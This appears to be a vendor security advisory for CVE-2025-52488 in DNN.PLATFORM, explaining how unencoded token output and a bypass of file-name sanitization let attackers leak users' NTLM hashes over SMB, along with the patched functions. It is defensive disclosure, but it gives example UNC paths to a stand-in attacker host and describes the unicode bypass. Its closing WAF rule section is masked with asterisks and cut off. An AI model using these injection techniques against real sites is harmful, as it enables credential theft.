Miggo Logo

CVE-2025-52488:
DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input

8.6

CVSS Score
3.1

Basic Information

EPSS Score
0.11503%
Published
6/20/2025
Updated
6/27/2025
KEV Status
No
Technology
TechnologyC#

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
DNN.PLATFORMnuget>= 6.0.0, < 10.0.110.0.1

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability is a high-severity information disclosure issue that allows an attacker to steal NTLM hashes from users of a vulnerable DNN.PLATFORM instance. The root cause of the vulnerability is twofold:

  1. Lack of Output Encoding in Token Replacement: The primary issue lies in the token replacement system. Multiple components throughout the platform use this system to insert dynamic values into content. Before the patch, the output of these tokens was not encoded by default. This allowed an attacker to inject a UNC path (e.g., \\attacker.com\resource.jpg) as the value of a token. When this token is rendered in a context that resolves URLs (like an <img> tag's src attribute), the user's browser will attempt to authenticate with the attacker's SMB server, thereby leaking the NTLM hash of the user's Windows account.

  2. Improper File Name Sanitization: A second vector for this attack exists in the file upload functionality of the CKEditor provider. The file name sanitization logic could be bypassed by using specific unicode characters in the file name. These characters would be converted to path separators (\) after the sanitization check, allowing an attacker to create a file with a UNC path. When this file is accessed, the same NTLM hash leakage occurs.

The patch addresses these issues by:

  1. Introducing a new method AddPropertySource in the base token replacement class. This method wraps property sources in an HTML encoder by default, thus neutralizing the UNC path injection in the token replacement system.
  2. Fixing the file name sanitization logic by performing the unicode character conversion before the cleaning, ensuring that any malicious characters are caught.

As a security engineer, you should be aware that any part of the DNN site that uses token replacement to display user-controllable data could have been a potential vector for this attack. The file upload functionality, especially in rich text editors, was another key entry point. The patch effectively mitigates these risks.

Vulnerable functions

DotNetNuke.Services.Tokens.TokenReplace.TokenReplace
DNN Platform/Library/Services/Tokens/TokenReplace.cs
The constructor of this class was responsible for initializing the token replacement engine. Before the patch, it added property sources directly to the `PropertySource` dictionary without any output encoding. This meant that any token could be replaced with a raw, unencoded value. If a user could control the value of a token, they could inject a UNC path (e.g., `\\attacker.com\share`). When this path is rendered in a web page (e.g., in an `<img>` tag), the browser would attempt to connect to the SMB share, leaking the user's NTLM hash. The fix was to use the new `AddPropertySource` method, which wraps the property source in an HTML encoder by default.
DotNetNuke.Services.Tokens.HtmlTokenReplace.HtmlTokenReplace
DNN Platform/Library/Services/Tokens/HtmlTokenReplace.cs
Similar to `TokenReplace`, the constructor of `HtmlTokenReplace` was adding property sources without output encoding. This is particularly dangerous for sources like `css`, which can contain `url()` values. A malicious token could be replaced with a UNC path inside a CSS `url()`, causing the browser to leak the NTLM hash. The fix applies default HTML encoding to the token output.
DotNetNuke.UI.Modules.Html5.Html5ModuleTokenReplace.Html5ModuleTokenReplace
DNN Platform/Library/UI/Modules/Html5/Html5ModuleTokenReplace.cs
This constructor was adding a `request` property source, which allows token replacement based on the current HTTP request parameters. Since these parameters can be controlled by a user, this was a direct vector for injecting a malicious UNC path into a token. The lack of output encoding made this vulnerability exploitable. The fix ensures that the output of the `request` token is HTML encoded by default.
DNNConnect.CKE.Browser.UploadFile
DNN Platform/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/Browser.aspx.cs
This function handles file uploads and was vulnerable to a path traversal attack due to improper sanitization of the file name. The original code converted unicode characters *after* cleaning the file name. This allowed a malicious user to craft a file name with specific unicode characters that would be converted to backslashes (`\`) after the sanitization step, effectively bypassing it. This could be used to create a file with a UNC path, and when this file is accessed, it could trigger an SMB request and leak the NTLM hash.
DNNConnect.CKE.FileUploader.UploadWholeFile
DNN Platform/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx.cs
This function, similar to `UploadFile`, was vulnerable to the same file name sanitization bypass. By moving the unicode conversion before the cleaning, the patch ensures that any potentially dangerous characters are handled correctly before the file is saved.
DotNetNuke.Modules.Journal.Components.JournalItemTokenReplace.JournalItemTokenReplace
DNN Platform/Modules/Journal/Components/JournalItemTokenReplace.cs
The constructor for `JournalItemTokenReplace` was adding the `journalitem` property source without encoding. Since journal items can contain user-supplied content, this could be used to inject a UNC path and leak NTLM hashes when the journal item is displayed. The fix applies default HTML encoding.

WAF Protection Rules

WAF Rule

*NN.PL*T*ORM *llows * sp**i*lly *r**t** s*ri*s o* m*li*ious int*r**tion **n *xpos* NTLM **s**s to * t*ir* p*rty SM* s*rv*r. T*is vuln*r**ility is *ix** in **.*.*.

Reasoning

T** vuln*r**ility is * *i**-s*v*rity in*orm*tion *is*losur* issu* t**t *llows *n *tt**k*r to st**l NTLM **s**s *rom us*rs o* * vuln*r**l* *NN.PL*T*ORM inst*n**. T** root **us* o* t** vuln*r**ility is two*ol*: *. **L**k o* Output *n*o*in* in Tok*n R